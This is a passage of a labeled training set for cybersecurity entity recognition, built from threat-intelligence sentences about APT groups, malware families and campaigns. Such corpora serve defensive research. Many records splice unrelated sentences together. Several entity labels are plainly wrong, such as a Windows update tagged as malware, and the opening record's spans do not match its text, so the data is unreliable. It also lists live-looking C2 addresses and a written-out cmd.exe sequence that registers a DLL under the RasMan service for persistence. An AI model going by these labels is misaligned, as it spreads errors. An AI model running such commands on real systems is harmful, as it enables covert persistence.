This malware family can be used to compromise multiple vendor platforms and leverages uncommon technology to access physical devices .", "spans": {"THREAT_ACTOR: TEMP.Periscope": [[29, 43]], "THREAT_ACTOR: Cobalt Strike": [[228, 241]], "FILEPATH: malware": [[320, 327]]}, "info": {"id": "cyberner_stix_train_006708", "source": "cyberner_stix_train"}} {"text": "The files exploit the well-known Microsoft Office vulnerability , CVE-2012-0158 , to execute malicious code in order to take control of the targeted systems . While PLEAD and KIVARS are most likely to be used in first phase attacks , Waterbear can be seen as a secondary backdoor installed after attackers have gained a certain level of privilege .", "spans": {"MALWARE: files": [[4, 9]], "VULNERABILITY: Microsoft Office vulnerability": [[33, 63]], "VULNERABILITY: CVE-2012-0158": [[66, 79]], "MALWARE: PLEAD": [[165, 170]], "MALWARE: KIVARS": [[175, 181]]}, "info": {"id": "cyberner_stix_train_006709", "source": "cyberner_stix_train"}} {"text": "The tools and techniques used throughout these attacks are consistent with several Chinese threat actors , such as APT10 , a threat actor believed to operate on behalf of the Chinese Ministry of State Security . 
Later that month , the same tactics and patterns were seen in attempts against an Iranian women 's activist – an individual commonly targeted by Iranian actors , such as Charming Kitten and the Sima campaign documented in our 2016 Black Hat talk .", "spans": {"THREAT_ACTOR: threat actors": [[91, 104]], "THREAT_ACTOR: APT10": [[115, 120]], "THREAT_ACTOR: threat actor": [[125, 137]], "ORGANIZATION: Iranian women 's activist": [[294, 319]], "ORGANIZATION: individual": [[325, 335]]}, "info": {"id": "cyberner_stix_train_006710", "source": "cyberner_stix_train"}} {"text": "Although tracking threats like Winnti involves old-fashioned investigative work , Microsoft Threat Intelligence analysts take advantage of machine learning to work at scale .", "spans": {"MALWARE: Winnti": [[31, 37]], "TOOL: machine learning": [[139, 155]]}, "info": {"id": "cyberner_stix_train_006711", "source": "cyberner_stix_train"}} {"text": "Interestingly , early “ clean ” versions contain varying levels of signals that the updates will include malicious code later . While not detected at the time , Microsoft 's antivirus and security products now detect this Barium malicious file and flag the file as \" Win32/ShadowPad.A \" . There are some built in functions on the side for the more common features . The sample of LIGHTWORK we obtained includes eight hardcoded IEC-104 information object addresses ( IOA ) , which typically correlate with input or output data elements on a device and may correspond to power line switches or circuit breakers in an RTU or relay configuration .", "spans": {"ORGANIZATION: Microsoft": [[161, 170]], "THREAT_ACTOR: Barium": [[222, 228]], "MALWARE: Win32/ShadowPad.A": [[267, 284]], "TOOL: LIGHTWORK": [[380, 389]]}, "info": {"id": "cyberner_stix_train_006712", "source": "cyberner_stix_train"}} {"text": "It will check the version of Android installed and decide which library should be patched . 
This threat is another proof point that attackers are clearly incorporating the mobile device into their surveillance campaigns as a primary attack vector . RevengeHotels is a campaign that has been active since at least 2015 , revealing different groups using traditional RAT malware to infect businesses in the hospitality sector . ItaDuke because it reminded us of Duqu and because of the ancient Italian comments in the shellcode copied from Dante Alighieri - s ? Divine Comedy .", "spans": {"SYSTEM: Android": [[29, 36]], "TOOL: mobile device": [[172, 185]], "THREAT_ACTOR: RevengeHotels": [[249, 262]], "MALWARE: RAT": [[365, 368]], "MALWARE: ItaDuke": [[426, 433]], "MALWARE: Duqu": [[460, 464]], "ORGANIZATION: Dante Alighieri": [[538, 553]], "ORGANIZATION: Divine Comedy": [[560, 573]]}, "info": {"id": "cyberner_stix_train_006713", "source": "cyberner_stix_train"}} {"text": "To provide context around such alerts , Windows Defender ATP also features a short summary of the group ’s history , goals , methods , and tools , with links to extensive documentation for technically minded users .", "spans": {"TOOL: Windows Defender ATP": [[40, 60]]}, "info": {"id": "cyberner_stix_train_006714", "source": "cyberner_stix_train"}} {"text": "In over half of the targeted threat response engagements performed by the Dell SecureWorks Counter Threat Unit Special Operations ( CTU-SO ) team in the past year , the threat actors accessed the target environment using compromised credentials and the companies' own virtual private network ( VPN ) or other remote access solutions .", "spans": {"ORGANIZATION: Dell SecureWorks Counter Threat Unit Special Operations": [[74, 129]], "ORGANIZATION: CTU-SO": [[132, 138]], "TOOL: virtual private network": [[268, 291]], "TOOL: VPN": [[294, 297]]}, "info": {"id": "cyberner_stix_train_006715", "source": "cyberner_stix_train"}} {"text": "The developer of this particular payload configured it to use the following URL to communicate with as its C2 : 
http://188.241.58.170/local/s3/filters.php .", "spans": {"TOOL: C2": [[107, 109]], "FILEPATH: http://188.241.58.170/local/s3/filters.php": [[112, 154]]}, "info": {"id": "cyberner_stix_train_006716", "source": "cyberner_stix_train"}} {"text": "Trojan anatomy The family was named Riltok after the librealtalk-jni.so library contained in the APK file of the Trojan . McAfee concludes that some groups—and especially the Poetry Group —have shifted tactics to use Citadel in ways other than what it was originally intended for . The .dll file is executed by the .exe file .", "spans": {"MALWARE: Riltok": [[36, 42]], "ORGANIZATION: McAfee": [[122, 128]], "THREAT_ACTOR: Group": [[182, 187]], "FILEPATH: .dll": [[286, 290]], "FILEPATH: .exe": [[315, 319]]}, "info": {"id": "cyberner_stix_train_006717", "source": "cyberner_stix_train"}} {"text": "One representative sample Chrysaor app that we analyzed was tailored to devices running Jellybean ( 4.3 ) or earlier . Between August 2 and 4 , the actor sent targeted spearphishing emails containing malicious URLs linking to documents to multiple defense contractors . Wait time is chosen randomly in the range 2/3 t to 5/3 . 
The Winnti group diversified its targets to include enterprises such as those in pharmaceutics and telecommunications .", "spans": {"MALWARE: Chrysaor": [[26, 34]], "SYSTEM: Jellybean ( 4.3 )": [[88, 105]], "THREAT_ACTOR: actor": [[148, 153]], "ORGANIZATION: defense contractors": [[248, 267]], "THREAT_ACTOR: Winnti group": [[331, 343]], "ORGANIZATION: pharmaceutics": [[408, 421]], "ORGANIZATION: telecommunications": [[426, 444]]}, "info": {"id": "cyberner_stix_train_006718", "source": "cyberner_stix_train"}} {"text": "They noted that this node appeared to be maliciously modifying any executables that were downloaded through it over a HTTP connection .", "spans": {}, "info": {"id": "cyberner_stix_train_006719", "source": "cyberner_stix_train"}} {"text": "Since then , the implant ’ s functionality has been improving and remarkable new features implemented , such as the ability to record audio surroundings via the microphone when an infected device is in a specified location ; the stealing of WhatsApp messages via Accessibility Services ; and the ability to connect an infected device to Wi-Fi networks controlled by cybercriminals . The group has been quite visible since the initial 2017 Malwarebytes report on their elaborate espionage attack against the Saudi Arabian government . Cleaver : Threat Group 2889 , TG-2889 .", "spans": {"SYSTEM: WhatsApp": [[241, 249]], "THREAT_ACTOR: group": [[387, 392]], "THREAT_ACTOR: Cleaver": [[534, 541]], "THREAT_ACTOR: Threat Group 2889": [[544, 561]], "THREAT_ACTOR: TG-2889": [[564, 571]]}, "info": {"id": "cyberner_stix_train_006720", "source": "cyberner_stix_train"}} {"text": "Upon creation , this activity launches a thread that will loop on a 50-second interval . In early 2016 the Callisto Group began sending highly targeted spear phishing emails with malicious attachments that contained , as their final payload , the \" Scout \" malware tool from the HackingTeam RCS Galileo platform . HIGHTIDE : 6e59861931fa2796ee107dc27bfdd480 . 
Newer versions of TrickBot have been known to use a custom communication protocol which sends the data unencrypted over port 443 .", "spans": {"MALWARE: malicious attachments": [[179, 200]], "TOOL: Scout": [[249, 254]], "MALWARE: HIGHTIDE": [[314, 322]], "FILEPATH: 6e59861931fa2796ee107dc27bfdd480": [[325, 357]], "MALWARE: TrickBot": [[378, 386]]}, "info": {"id": "cyberner_stix_train_006721", "source": "cyberner_stix_train"}} {"text": "data/configuration Exfiltration ;", "spans": {}, "info": {"id": "cyberner_stix_train_006722", "source": "cyberner_stix_train"}} {"text": "Our research exposes how the malware roots infected devices and steals authentication tokens that can be used to access data from Google Play , Gmail , Google Photos , Google Docs , G Suite , Google Drive , and more . Early APT38 operations suggest that the group began targeting financial institutions with an intent to manipulate financial transaction systems at least as early as February 2014 , although we did not observe fraudulent transactions until 2015 . 
optblock_t for defeating control flow flattening ( defined as CFUnflattener ) In any case , the VBA code still runs whenever the files are executed .", "spans": {"SYSTEM: Google Play": [[130, 141]], "SYSTEM: Gmail": [[144, 149]], "SYSTEM: Google Photos": [[152, 165]], "SYSTEM: Google Docs": [[168, 179]], "SYSTEM: G Suite": [[182, 189]], "SYSTEM: Google Drive": [[192, 204]], "THREAT_ACTOR: APT38": [[224, 229]], "THREAT_ACTOR: group": [[258, 263]], "ORGANIZATION: financial institutions": [[280, 302]], "TOOL: optblock_t": [[464, 474]], "MALWARE: VBA code": [[560, 568]]}, "info": {"id": "cyberner_stix_train_006723", "source": "cyberner_stix_train"}} {"text": "We assess that the Lazarus group has been more careful in its attacks following the release of Operation AppleJeus and they have employed a number of methods to avoid being detected .", "spans": {"THREAT_ACTOR: Lazarus": [[19, 26]]}, "info": {"id": "cyberner_stix_train_006724", "source": "cyberner_stix_train"}} {"text": "Targeted senior figures managed communications and media affairs , policy , speech writing , finance , and travel , while junior figures arranged schedules and travel for Hillary Clinton's campaign trail .", "spans": {}, "info": {"id": "cyberner_stix_train_006725", "source": "cyberner_stix_train"}} {"text": "The malware leverages an exploit , codenamed EternalBlue” , that was released by the Shadow Brokers on April 14 , 2017 . 
Gallmaker 's targets are embassies of an Eastern European country .", "spans": {"VULNERABILITY: EternalBlue”": [[45, 57]], "THREAT_ACTOR: Shadow Brokers": [[85, 99]], "THREAT_ACTOR: Gallmaker": [[121, 130]], "ORGANIZATION: embassies": [[146, 155]]}, "info": {"id": "cyberner_stix_train_006726", "source": "cyberner_stix_train"}} {"text": "But on rare occasions , a customer decides to go public with information about their incident and give us permission to share our knowledge of the adversary tradecraft with the broader community and help protect even those who do not happen to be our customers .", "spans": {}, "info": {"id": "cyberner_stix_train_006727", "source": "cyberner_stix_train"}} {"text": "The properties of the artifact show that the same authors of the malware seem to have called it Xtunnel .", "spans": {"MALWARE: Xtunnel": [[96, 103]]}, "info": {"id": "cyberner_stix_train_006728", "source": "cyberner_stix_train"}} {"text": "The malware sets a registry value ( whose name is read from the configuration file ) to “ C : \\Windows\\system32\\rundll32.exe c : \\ProgramData\\AuditApp\\d3d9.dll , Control_Run ” . APT35 also installed BROKEYOLK , a custom backdoor , to maintain persistence on the compromised host . One of the AES implementations makes use of the Intel AES-NI encryption instruction set which is supported by several modern Intel and AMD CPUs . 
By analyzing the source code , researchers can identify similar patterns and techniques used by different threat actors , providing defenders with a way to proactively detect and block the new variants at the initial stage of an attack .", "spans": {"THREAT_ACTOR: APT35": [[178, 183]], "TOOL: custom backdoor": [[213, 228]], "ORGANIZATION: Intel": [[329, 334], [406, 411]], "TOOL: AES-NI": [[335, 341]], "ORGANIZATION: AMD": [[416, 419]]}, "info": {"id": "cyberner_stix_train_006729", "source": "cyberner_stix_train"}} {"text": "24 Aug 2016 - 02:05PM Android/Twitoor is a backdoor capable of downloading other malware onto an infected device . Scattered Canary’s fraudulent history can be traced as far back as October 2008 , when the group first arrived on the cybercriminal circuit . cyberattacks against high-value targets in Ukraine in December 2015 and December 2016 .", "spans": {"MALWARE: Android/Twitoor": [[22, 37]], "THREAT_ACTOR: Scattered Canary’s": [[115, 133]], "THREAT_ACTOR: group": [[206, 211]]}, "info": {"id": "cyberner_stix_train_006730", "source": "cyberner_stix_train"}} {"text": "The Kaspersky Labs analysis of the Duke malware authors ’ working times is supported by our own analysis , as well as that performed by FireEye .", "spans": {"ORGANIZATION: Kaspersky Labs": [[4, 18]], "THREAT_ACTOR: Duke": [[35, 39]], "ORGANIZATION: FireEye": [[136, 143]]}, "info": {"id": "cyberner_stix_train_006731", "source": "cyberner_stix_train"}} {"text": "cmd.exe /c dir rasext.dll , cmd.exe /c dir msctfp.dat , cmd.exe /c tasklist /svc | findstr RasMan , cmd.exe /c reg add HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\services\\RasMan\\ThirdParty /v DllName /d rasext.dll /f .", "spans": {"FILEPATH: cmd.exe": [[0, 7], [28, 35], [56, 63], [100, 107]], "FILEPATH: rasext.dll": [[15, 25], [204, 214]], "FILEPATH: msctfp.dat": [[43, 53]], "TOOL: RasMan": [[91, 97]]}, "info": {"id": "cyberner_stix_train_006732", "source": "cyberner_stix_train"}} {"text": "Of those , 21 were still 
available at the time of discovery . ESET recently analyzed a new Mac OS sample from the OceanLotus group that had been uploaded to VirusTotal . Loading the dropped library .", "spans": {"ORGANIZATION: ESET": [[62, 66]], "MALWARE: sample": [[98, 104]], "THREAT_ACTOR: OceanLotus": [[114, 124]]}, "info": {"id": "cyberner_stix_train_006733", "source": "cyberner_stix_train"}} {"text": "By targeting high-tech and manufacturing operations in Japan and Taiwan , DragonOK may be acquiring trade secrets for a competitive economic advantage . The dropped PE file has the distinctive file name 8.t” .", "spans": {"ORGANIZATION: high-tech": [[13, 22]], "ORGANIZATION: manufacturing": [[27, 40]], "THREAT_ACTOR: DragonOK": [[74, 82]], "ORGANIZATION: economic": [[132, 140]], "MALWARE: PE": [[165, 167]], "FILEPATH: 8.t”": [[203, 207]]}, "info": {"id": "cyberner_stix_train_006734", "source": "cyberner_stix_train"}} {"text": "DanderSpritz is the framework for controlling infected machines , different from FuZZbuNch as the latter provides a limited toolkit for the post-exploitation stage with specific functions such as DisableSecurity and EnableSecurity for DarkPulsar . The Windows 10 Creators Update will bring several enhancements to Windows Defender ATP that will provide SOC personnel with options for immediate mitigation of a detected threat .", "spans": {"TOOL: DanderSpritz": [[0, 12]], "TOOL: FuZZbuNch": [[81, 90]], "TOOL: DisableSecurity": [[196, 211]], "TOOL: EnableSecurity": [[216, 230]], "TOOL: DarkPulsar": [[235, 245]], "MALWARE: Windows 10 Creators Update": [[252, 278]], "ORGANIZATION: Windows Defender ATP": [[314, 334]], "ORGANIZATION: SOC personnel": [[353, 366]]}, "info": {"id": "cyberner_stix_train_006735", "source": "cyberner_stix_train"}} {"text": "The shell backdoor then installs the RCSAndroid agent . From 2013 Carbanak intensified its activity focused on banks and electronic payment systems in Russia and in the post-Soviet space . 
the original implementation of the code only works in MMAT_LOCOPT maturity level . Adversaries may manipulate physical process control within the industrial environment .", "spans": {"MALWARE: RCSAndroid": [[37, 47]], "VULNERABILITY: Carbanak": [[66, 74]], "ORGANIZATION: banks": [[111, 116]], "ORGANIZATION: electronic payment": [[121, 139]], "ORGANIZATION: space": [[181, 186]], "TOOL: MMAT_LOCOPT": [[243, 254]]}, "info": {"id": "cyberner_stix_train_006736", "source": "cyberner_stix_train"}} {"text": "From our trend analysis seen in Figure 3 , Locky ransomware started being delivered via DOCM format email attachments more extensively beginning in August . Later that month , the same tactics and patterns were seen in attempts against an Iranian women 's activist – an individual commonly targeted by Iranian actors , such as Charming Kitten and the Sima campaign documented in our 2016 Black Hat talk .", "spans": {"MALWARE: Locky": [[43, 48]], "ORGANIZATION: Iranian women 's activist": [[239, 264]], "ORGANIZATION: individual": [[270, 280]]}, "info": {"id": "cyberner_stix_train_006737", "source": "cyberner_stix_train"}} {"text": "The sample we analyzed is using RijndaelManaged with ECB mode and PKCS7 padding .", "spans": {}, "info": {"id": "cyberner_stix_train_006738", "source": "cyberner_stix_train"}} {"text": "Estimating the damages is challenging , but as we learned , the criminals are siphoning off assets in transactions that do not exceed $15,000 each . The SWC of a Uyghur cultural website suggests intent to target the Uyghur ethnic group , a Muslim minority group primarily found in the Xinjiang region of China .", "spans": {"ORGANIZATION: Uyghur ethnic group": [[216, 235]], "ORGANIZATION: Muslim minority group": [[240, 261]]}, "info": {"id": "cyberner_stix_train_006739", "source": "cyberner_stix_train"}} {"text": "The version of the legitimate DroidVPN embedded inside this HenBox variant is the same version of DroidVPN available for download from uyghurapps [ . 
Winnti is targeting high-tech companies as well as chemical and pharmaceutical companies . Between November 26 , 2015 , and December 1 , 2015 , known and suspected China-based APT groups launched several spear phishing attacks targeting Japanese and Taiwanese organizations in the high-tech , government services , media and financial services industries .", "spans": {"MALWARE: HenBox": [[60, 66]], "THREAT_ACTOR: Winnti": [[150, 156]], "ORGANIZATION: high-tech companies": [[170, 189]], "ORGANIZATION: pharmaceutical companies": [[214, 238]], "THREAT_ACTOR: APT groups": [[326, 336]], "ORGANIZATION: high-tech": [[431, 440]], "ORGANIZATION: government services": [[443, 462]], "ORGANIZATION: media": [[465, 470]], "ORGANIZATION: financial services industries": [[475, 504]]}, "info": {"id": "cyberner_stix_train_006740", "source": "cyberner_stix_train"}} {"text": "Perpetrated by an Arabic-Speaking APT Group : The modus-operandi of the attackers in conjunction with the social engineering tactics and decoy content seem aligned with previous attacks carried out by the Arabic-speaking APT group MoleRATs ( aka Gaza Cybergang ) .", "spans": {"THREAT_ACTOR: MoleRATs": [[231, 239]], "THREAT_ACTOR: Gaza Cybergang": [[246, 260]]}, "info": {"id": "cyberner_stix_train_006741", "source": "cyberner_stix_train"}} {"text": "Kelihos , like many others , implemented a sophisticated spam engine that automatically constructs spam messages from templates and additional inputs to avoid any patterns that can be used in filters . 
The group has demonstrated the ability to identify a significant zero-day vulnerability within a popular Japanese corporate tool and then use scan-and-exploit techniques to indiscriminately compromise Japanese Internet-facing enterprise systems .", "spans": {"TOOL: Kelihos": [[0, 7]], "VULNERABILITY: zero-day": [[267, 275]]}, "info": {"id": "cyberner_stix_train_006742", "source": "cyberner_stix_train"}} {"text": "WolfRAT is a specifically targeted RAT which we assess to be aimed at Thai individuals and , based on previous work from Wolf Research , most likely used as an intelligence-gathering tool or interception tool . On June 7 , 2013 , Rapid7 released an analysis of malware dubbed ' KeyBoy ' , also exploiting unknown vulnerabilities in Microsoft Office , similarly patched by MS12-060 , but allegedly targeting interests in Vietnam and India . FireEye believes the change from RIPTIDE to HIGHTIDE represents a temporary tool shift to decrease malware detection while APT12 developed a completely new malware toolset . 
We first heard of this new campaign thanks to a Mastodon post by Randy McEoin .", "spans": {"MALWARE: WolfRAT": [[0, 7]], "ORGANIZATION: Wolf Research ,": [[121, 136]], "ORGANIZATION: Rapid7": [[230, 236]], "TOOL: KeyBoy": [[278, 284]], "TOOL: MS12-060": [[372, 380]], "ORGANIZATION: FireEye": [[440, 447]], "MALWARE: RIPTIDE": [[473, 480]], "MALWARE: HIGHTIDE": [[484, 492]], "THREAT_ACTOR: APT12": [[563, 568]], "ORGANIZATION: Mastodon": [[662, 670]], "ORGANIZATION: Randy McEoin": [[679, 691]]}, "info": {"id": "cyberner_stix_train_006743", "source": "cyberner_stix_train"}} {"text": "Use stringent file reputation settings .", "spans": {}, "info": {"id": "cyberner_stix_train_006744", "source": "cyberner_stix_train"}} {"text": "The two C&C ’s hardcoded in the configuration block of the main binary are :", "spans": {"TOOL: C&C": [[8, 11]]}, "info": {"id": "cyberner_stix_train_006745", "source": "cyberner_stix_train"}} {"text": "The domain on this campaign was registered on Jan. 19 , 2019 . Our report will detail the most recent campaigns conducted by APT10 , including the sustained targeting of MSPs , which we have named Operation Cloud Hopper , and the targeting of a number of Japanese institutions . OceanLotus : worker.baraeme.com:8888 11b4 . 
The Platform can look for indicators across file attachments , embedded links , and more and provides inplatform scoring .", "spans": {"THREAT_ACTOR: APT10": [[125, 130]], "ORGANIZATION: MSPs": [[170, 174]], "ORGANIZATION: institutions": [[264, 276]], "THREAT_ACTOR: OceanLotus": [[279, 289]], "DOMAIN: worker.baraeme.com:8888": [[292, 315]], "TOOL: Platform": [[327, 335]]}, "info": {"id": "cyberner_stix_train_006746", "source": "cyberner_stix_train"}} {"text": "On the Windows XP platform , this support is provided by the csrss.exe process .", "spans": {"SYSTEM: Windows XP": [[7, 17]], "FILEPATH: csrss.exe": [[61, 70]]}, "info": {"id": "cyberner_stix_train_006747", "source": "cyberner_stix_train"}} {"text": "This malware in turn intercepts fraudulent Lazarus cash withdrawal requests and sends fake approval responses , allowing the attackers to steal cash from ATMs . TG-3390 's activities indicate a preference for leveraging SWCs and scan-and-exploit techniques to compromise target systems .", "spans": {"TOOL: malware": [[5, 12]], "THREAT_ACTOR: Lazarus": [[43, 50]]}, "info": {"id": "cyberner_stix_train_006748", "source": "cyberner_stix_train"}} {"text": "As root , the application copies su binary to /system/bin directory and silently downloads apk file from the server . According to FireEye , the admin@338 sent out emails containing malicious documents designed to exploit Microsoft Office vulnerabilities in an effort to deliver a piece of malware dubbed LOWBALL . 
DustySky has been developed and used since May 2015 by Molerats ( aka \" Gaza cybergang \" ) , a terrorist group whose main objective in this campaign is intelligence gathering .", "spans": {"ORGANIZATION: FireEye": [[131, 138]], "THREAT_ACTOR: admin@338": [[145, 154]], "VULNERABILITY: Microsoft Office vulnerabilities": [[222, 254]], "TOOL: LOWBALL": [[305, 312]], "MALWARE: DustySky": [[315, 323]], "THREAT_ACTOR: Molerats": [[370, 378]], "THREAT_ACTOR: Gaza cybergang": [[387, 401]]}, "info": {"id": "cyberner_stix_train_006749", "source": "cyberner_stix_train"}} {"text": "After all , Stuxnet , widely regarded as the world ’s first known cyberweapon , was signed using stolen certificates from companies based in Taiwan with dates much earlier than Suckfly .", "spans": {"VULNERABILITY: Stuxnet": [[12, 19]], "THREAT_ACTOR: Suckfly": [[177, 184]]}, "info": {"id": "cyberner_stix_train_006750", "source": "cyberner_stix_train"}} {"text": "The doping allegations and prospective ban from the Games further ostracized Russia , and likely provided motivation to actively counter the allegations by attempting to discredit anti-doping agencies and policies .", "spans": {}, "info": {"id": "cyberner_stix_train_006751", "source": "cyberner_stix_train"}} {"text": "Much of the activity was observed in the United States (Figure 11) , and the most targeted industry vertical was Aerospace/Defense Contractors (Figure 12) . 
A preliminary analysis caught the attention of our Threat Analysis and Intelligence team as it yielded interesting data that , among other things , shows that Silence was targeting employees from financial entities , specifically in the Russian Federation and the Republic of Belarus .", "spans": {"ORGANIZATION: Aerospace/Defense": [[113, 130]], "ORGANIZATION: employees": [[338, 347]], "ORGANIZATION: financial entities": [[353, 371]]}, "info": {"id": "cyberner_stix_train_006752", "source": "cyberner_stix_train"}} {"text": "Documents with the Flash exploit managed to evade static defenses and remain undetected as an exploit on VirusTotal . Primary targets for this adversary are in the government , aerospace , NGO , defense , cryptology and education sectors .", "spans": {"MALWARE: Documents": [[0, 9]], "VULNERABILITY: Flash exploit": [[19, 32]], "ORGANIZATION: government": [[164, 174]], "ORGANIZATION: aerospace": [[177, 186]], "ORGANIZATION: NGO": [[189, 192]], "ORGANIZATION: defense": [[195, 202]], "ORGANIZATION: cryptology": [[205, 215]], "ORGANIZATION: education sectors": [[220, 237]]}, "info": {"id": "cyberner_stix_train_006753", "source": "cyberner_stix_train"}} {"text": "When required , the Trojan sends an SMS to the specified phone number with the information it has received from the intercepted message . The backdoor was delivered via a malicious .rtf file that exploited CVE-2017-0199 . 
In November 2017 , Secureworks Counter Threat Unit™ ( CTU ) researchers discovered the North Korean cyber threat group , known as Lazarus Group and internally tracked as NICKEL ACADEMY by Secureworks , had launched a malicious spearphishing campaign using the lure of a job opening for the CFO role at a European-based cryptocurrency company .", "spans": {"MALWARE: .rtf file": [[181, 190]], "VULNERABILITY: CVE-2017-0199": [[206, 219]], "ORGANIZATION: Secureworks Counter Threat Unit™": [[241, 273]], "ORGANIZATION: CTU": [[276, 279]], "THREAT_ACTOR: Lazarus Group": [[352, 365]], "THREAT_ACTOR: NICKEL ACADEMY": [[392, 406]], "ORGANIZATION: Secureworks": [[410, 421]], "ORGANIZATION: cryptocurrency company": [[541, 563]]}, "info": {"id": "cyberner_stix_train_006754", "source": "cyberner_stix_train"}} {"text": "The two executables related to Hermes are bitsran.exe and RSW7B37.tmp . The actors attempted to exploit CVE-2014-6332 using a slightly modified version of the proof-of-concept ( POC ) code to install a Trojan called Emissary , which is related to the Operation Lotus Blossom campaign .", "spans": {"TOOL: Hermes": [[31, 37]], "MALWARE: bitsran.exe": [[42, 53]], "MALWARE: RSW7B37.tmp": [[58, 69]], "THREAT_ACTOR: actors": [[76, 82]], "VULNERABILITY: exploit": [[96, 103]], "VULNERABILITY: CVE-2014-6332": [[104, 117]], "MALWARE: Trojan": [[202, 208]], "MALWARE: Emissary": [[216, 224]]}, "info": {"id": "cyberner_stix_train_006755", "source": "cyberner_stix_train"}} {"text": "” : ” load ” } Propagation The banking Trojan is propagated via phishing SMS containing a link and an offer to view a photo or MMS . After gaining access to a target network in one intrusion analyzed by CTU researchers , TG-3390 actors identified and exfiltrated data for specific projects run by the target organization , indicating that they successfully obtained the information they sought . Another variant executes a set of commands once a system is successfully compromised . 
Bullock had spent many hours poring over the hundreds of thousands of emails that the Ashley Madison hackers stole from Biderman and published online in 2015 .", "spans": {"ORGANIZATION: CTU": [[203, 206]], "THREAT_ACTOR: TG-3390": [[221, 228]], "ORGANIZATION: Bullock": [[483, 490]], "THREAT_ACTOR: Ashley Madison hackers": [[569, 591]], "ORGANIZATION: Biderman": [[603, 611]]}, "info": {"id": "cyberner_stix_train_006756", "source": "cyberner_stix_train"}} {"text": "In this instance , the backdoor posts the data to the domain Nysura.com ( For more domains , please see the IOC section of this research ) .", "spans": {"DOMAIN: Nysura.com": [[61, 71]]}, "info": {"id": "cyberner_stix_train_006757", "source": "cyberner_stix_train"}} {"text": "Unlike many activity groups , which typically gather information for monetary gain or economic espionage , PROMETHIUM and NEODYMIUM appear to launch campaigns simply to gather information about certain individuals . XENOTIME used credential capture and replay to move between networks , Windows commands , standard command-line tools such as PSExec , and proprietary tools for operations on victim hosts .", "spans": {"THREAT_ACTOR: activity groups": [[12, 27]], "ORGANIZATION: economic": [[86, 94]], "THREAT_ACTOR: PROMETHIUM": [[107, 117]], "THREAT_ACTOR: NEODYMIUM": [[122, 131]], "THREAT_ACTOR: XENOTIME": [[216, 224]], "MALWARE: credential capture and replay": [[230, 259]], "SYSTEM: Windows": [[287, 294]], "MALWARE: PSExec": [[342, 348]]}, "info": {"id": "cyberner_stix_train_006758", "source": "cyberner_stix_train"}} {"text": "The infected application contains its payload inside the DEX file . These sub-domains simulate sub-sections of the main newspapers in Spain plus some international ones like the Guardian and the Washington Post . It replaces the contents of the legitimate process with malicious code . 
The RAT 's main binary is launched from \" C:\\Users\\%username%\\AppData\\Roaming\\BranScale\\client32.exe \" .", "spans": {"ORGANIZATION: newspapers": [[120, 130]], "ORGANIZATION: Washington Post": [[195, 210]]}, "info": {"id": "cyberner_stix_train_006759", "source": "cyberner_stix_train"}} {"text": "Background Uncovering PHAs takes a lot of detective work and unraveling the mystery of how they 're possibly connected to other apps takes even more . On it , MoneyTaker install a legitimate tool for penetration testing – Metasploit . Following the exploitation of the EPS and CVE-2015-1701 vulnerabilities , the exploit payload drops either a 32-bit or 64-bit binary containing an embedded IRONHALO malware sample . If the system is in a single - system domain , it will execute on the local computer .", "spans": {"THREAT_ACTOR: MoneyTaker": [[159, 169]], "TOOL: Metasploit": [[222, 232]], "TOOL: EPS": [[269, 272]], "VULNERABILITY: CVE-2015-1701": [[277, 290]], "MALWARE: IRONHALO": [[391, 399]]}, "info": {"id": "cyberner_stix_train_006760", "source": "cyberner_stix_train"}} {"text": "Our researchers are working closely with Google to investigate the source of the Gooligan campaign . In early 2014 , the APT38 deployed NESTEGG ( a backdoor ) and KEYLIME ( a keylogger ) malware designed to impact financial institution-specific systems at a Southeast Asian bank . it is important to understand Hex-Rays maturity levels . 
None The bottom line is that BadBlood is not one of its kind however , for Charming Kitten , it implies a shift in target and collection priorities as they usually target dissidents , academics , diplomats , and journalists in order to further Iranian IRGC interests .", "spans": {"ORGANIZATION: Google": [[41, 47]], "MALWARE: Gooligan campaign": [[81, 98]], "THREAT_ACTOR: APT38": [[121, 126]], "TOOL: NESTEGG": [[136, 143]], "TOOL: KEYLIME": [[163, 170]], "TOOL: keylogger": [[175, 184]], "ORGANIZATION: bank": [[274, 278]], "TOOL: Hex-Rays": [[311, 319]], "THREAT_ACTOR: Charming Kitten": [[413, 428]], "ORGANIZATION: dissidents , academics , diplomats , and journalists": [[509, 561]]}, "info": {"id": "cyberner_stix_train_006761", "source": "cyberner_stix_train"}} {"text": "These targets include foreign affairs government organizations both localized and abroad , and defense organizations ’ presence localized , located in Europe and also located in Afghanistan .", "spans": {}, "info": {"id": "cyberner_stix_train_006762", "source": "cyberner_stix_train"}} {"text": "If any application from that list was found , it utilizes the Janus vulnerability to inject the “ boot ” module into the repacked application . The threat actors have continually used Flash Player installers and Flash slideshows for decoys . 2 、An MSI package file downloaded from one of the URLs ; During the SolarWinds Compromise , APT29 used scheduler and schtasks to create new tasks on remote host as part of their lateral movement .", "spans": {"VULNERABILITY: Janus": [[62, 67]], "TOOL: Flash Player installers": [[184, 207]], "TOOL: Flash slideshows": [[212, 228]], "TOOL: MSI": [[248, 251]], "THREAT_ACTOR: SolarWinds Compromise": [[310, 331]], "THREAT_ACTOR: APT29": [[334, 339]]}, "info": {"id": "cyberner_stix_train_006763", "source": "cyberner_stix_train"}} {"text": "The files appear to include logs from 2013 that show the NSA was also targeting oil and investment companies across the Middle East . 
The main point that sets Operation Groundbait apart from the other attacks is that it has mostly been targeting anti-government separatists in the self-declared Donetsk and Luhansk People 's Republics .", "spans": {"ORGANIZATION: NSA": [[57, 60]], "ORGANIZATION: oil": [[80, 83]], "ORGANIZATION: investment companies": [[88, 108]], "ORGANIZATION: anti-government separatists": [[246, 273]]}, "info": {"id": "cyberner_stix_train_006764", "source": "cyberner_stix_train"}} {"text": "It turns out that contacts data isn’t the only unusual data SWAnalytics is interested in . We believe Emissary Panda exploited a recently patched vulnerability in Microsoft SharePoint tracked by CVE-2019-0604 , which is a remote code execution vulnerability used to compromise the server and eventually install a webshell .", "spans": {"MALWARE: SWAnalytics": [[60, 71]], "THREAT_ACTOR: Emissary Panda": [[102, 116]], "VULNERABILITY: vulnerability": [[146, 159]], "ORGANIZATION: Microsoft": [[163, 172]], "VULNERABILITY: CVE-2019-0604": [[195, 208]]}, "info": {"id": "cyberner_stix_train_006765", "source": "cyberner_stix_train"}} {"text": "Red Alert 2.0 is a banking bot that is currently very active online , and presents a risk to Android devices . Given the lapse in time between the spear-phishing and the heist activity in the above example , we suggest two separate but related groups under the North Korean regime were responsible for carrying out missions ; one associated with reconnaissance ( TEMP.Hermit or a related group ) and another for the heists ( 